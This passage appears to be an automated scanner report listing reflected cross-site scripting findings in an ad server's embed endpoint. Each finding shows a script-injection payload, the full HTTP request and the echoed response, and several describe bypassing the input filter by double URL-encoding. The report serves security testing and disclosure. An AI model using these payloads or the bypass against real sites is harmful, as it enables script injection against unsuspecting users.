i/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/*&a635f"><script>alert(1)</script>475f0068cb6=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.154. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [ybt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the ybt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e84e3</script><script>alert(1)</script>7b5373756af was submitted in the ybt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319e84e3</script><script>alert(1)</script>7b5373756af&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830270**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319e84e3</script><script>alert(1)</script>7b5373756af&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242
...[SNIP]...

1.155. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yhdata parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the yhdata request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a0d</script><script>alert(1)</script>3fdf58037c9 was submitted in the yhdata parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=a7a0d</script><script>alert(1)</script>3fdf58037c9&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:38:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300829936**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=a7a0d</script><script>alert(1)</script>3fdf58037c9&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW8
...[SNIP]...

1.156. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [yyob parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the yyob request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cda2b</script><script>alert(1)</script>5d10a5d9f71 was submitted in the yyob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=cda2b</script><script>alert(1)</script>5d10a5d9f71&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:41:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830077**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=cda2b</script><script>alert(1)</script>5d10a5d9f71&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFI
...[SNIP]...

1.157. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715 [zip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715

Issue detail

The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a663d</script><script>alert(1)</script>e9943327d44 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7074198056943715?yhdata=ycg=&yyob=&zip=,a663d</script><script>alert(1)</script>e9943327d44&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/B=uHK5TmKImlg-/J=1300828242222788/K=66pXSSIco6.r20sJciw1kg/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-stocks;_ylt=AlYL8I1xzYIcLYTMbOkbUyUUaq9_;_ylu=X3oDMTFkaW44ZGJhBHBvcwMxBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA3N0b2Nrcw--
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2727

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/1300830200**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,a663d</script><script>alert(1)</script>e9943327d44&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15npvg3li/M=791401.14523143.14352822.2140147/D=fin/S=2142203281:NE3/Y=YAHOO/EXP=1300835442/L=GCl0YEwNcmBqhH8YTVvEVQEcrcHW802JEFIAArZg/
...[SNIP]...

1.158. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a1f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67917aa09da was submitted in the REST URL parameter 2. This input was echoed as 3a1f9"><script>alert(1)</script>67917aa09da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573a1f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e67917aa09da/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573a1f9"><script>alert(1)</script>67917aa09da/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.159. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38f08%2522%253balert%25281%2529%252f%252fe64aa15b64c was submitted in the REST URL parameter 2. This input was echoed as 38f08";alert(1)//e64aa15b64c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135738f08%2522%253balert%25281%2529%252f%252fe64aa15b64c/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2661

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135738f08";alert(1)//e64aa15b64c/477.0.iframe.150x30/1300830308**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14
...[SNIP]...

1.160. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab3e4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5a7d79c881 was submitted in the REST URL parameter 3. This input was echoed as ab3e4"><script>alert(1)</script>f5a7d79c881 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ab3e4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef5a7d79c881/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2706

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30ab3e4"><script>alert(1)</script>f5a7d79c881/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.161. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c92f%2522%253balert%25281%2529%252f%252f31a589569f was submitted in the REST URL parameter 3. This input was echoed as 7c92f";alert(1)//31a589569f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x307c92f%2522%253balert%25281%2529%252f%252f31a589569f/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2658

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x307c92f";alert(1)//31a589569f/1300830324**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin
...[SNIP]...

1.162. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464 [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca1c8"><script>alert(1)</script>32f3224a8eb was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.7708217662293464?yhdata=ycg=&yyob=&zip=,&ybt=17;89;225;226;274;8319&click=http://global.ard.yahoo.com/SIG=15n7pekko/M=791401.14523143.14352822.2140147/D=fin/S=2142203282:NE3/Y=YAHOO/EXP=1300835444/L=qj0Yg0wNcmBqhH8YTVvEVQJxrcHW802JEFQABEzo/B=9S9SQ0wNPGo-/J=1300828244332581/K=AcYdkos2K46fktzpzjHQsA/A=6304025/R=0/*ca1c8"><script>alert(1)</script>32f3224a8eb HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news/category-bonds;_ylt=Ajko2vz8UWQKvx78UCy.ZSkUaq9_;_ylu=X3oDMTFjczduZG9rBHBvcwMyBHNlYwNuZXdzU2Vjb25kYXJ5RWxlbWVudHNOYXYEc2xrA2JvbmRz
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:988:45:0:42331:1300828243:L|46:477:988:45:0:42331:1300828217:L|46:475:801:132:0:38101:1300827956:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2663

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
